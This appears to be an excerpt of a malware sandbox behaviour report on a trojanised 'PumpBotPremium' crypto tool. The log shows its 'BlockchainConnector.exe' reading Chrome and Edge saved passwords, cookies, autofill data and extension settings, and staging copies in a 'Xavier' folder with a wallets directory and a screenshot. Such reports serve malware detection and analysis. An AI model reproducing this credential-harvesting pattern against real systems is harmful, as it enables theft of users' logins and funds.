Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: EnumSystemLocalesW,	3_2_0029685D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: EnumSystemLocalesW,	3_2_002968A8
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: EnumSystemLocalesW,	3_2_00296943
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_002969CE
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,	3_2_0025EB00
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,	3_2_00296C21
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00296D4A
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,	3_2_00296E50
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00296F1F
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: EnumSystemLocalesW,	3_2_0028D47B
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,	3_2_0028D9C2

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_cookies.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Chrome_Default_AFILLS.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
